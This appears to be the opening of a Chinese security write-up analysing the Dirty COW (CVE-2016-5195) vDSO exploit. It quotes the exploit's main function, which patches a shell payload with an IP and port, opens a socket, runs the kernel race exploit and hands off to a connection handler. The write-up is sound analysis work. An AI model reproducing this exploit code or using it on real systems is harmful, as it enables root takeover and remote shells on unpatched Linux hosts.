利用代码原出处
代码原帖
本人GitHub也保留有漏洞利用相关代码
CVE-2016-5195
作者 : 武汉大学Docker安全研究小组
一 . 代码运行流程
Main函数
int main(int argc, char *argv[])
{
struct prologue *prologue;
struct mem_arg arg;
uint16_t port;
uint32_t ip;
int s;
ip = htonl(PAYLOAD_IP);
port = htons(PAYLOAD_PORT);
if (argc > 1) {
if (parse_ip_port(argv[1], &ip, &port) != 0)
return EXIT_FAILURE;
}
fprintf(stderr, "[*] payload target: %s:%d\n",
inet_ntoa(*(struct in_addr *)&ip), ntohs(port));
arg.vdso_addr = get_vdso_addr();
if (arg.vdso_addr == NULL)
return EXIT_FAILURE;
prologue = fingerprint_prologue(arg.vdso_addr);
if (prologue == NULL) {
fprintf(stderr, "[-] this vDSO version isn't supported\n");
fprintf(stderr, " add first entry point instructions to prologues\n");
return EXIT_FAILURE;
}
if (patch_payload(prologue, ip, port) == -1)
return EXIT_FAILURE;
if (build_vdso_patch(arg.vdso_addr, prologue) == -1)
return EXIT_FAILURE;
s = create_socket(port);
if (s == -1)
return EXIT_FAILURE;
if (exploit(&arg, true) == -1) {
fprintf(stderr, "exploit failed\n");
return EXIT_FAILURE;
}
yeah(&arg, s);
return EXIT_SUCCESS;
}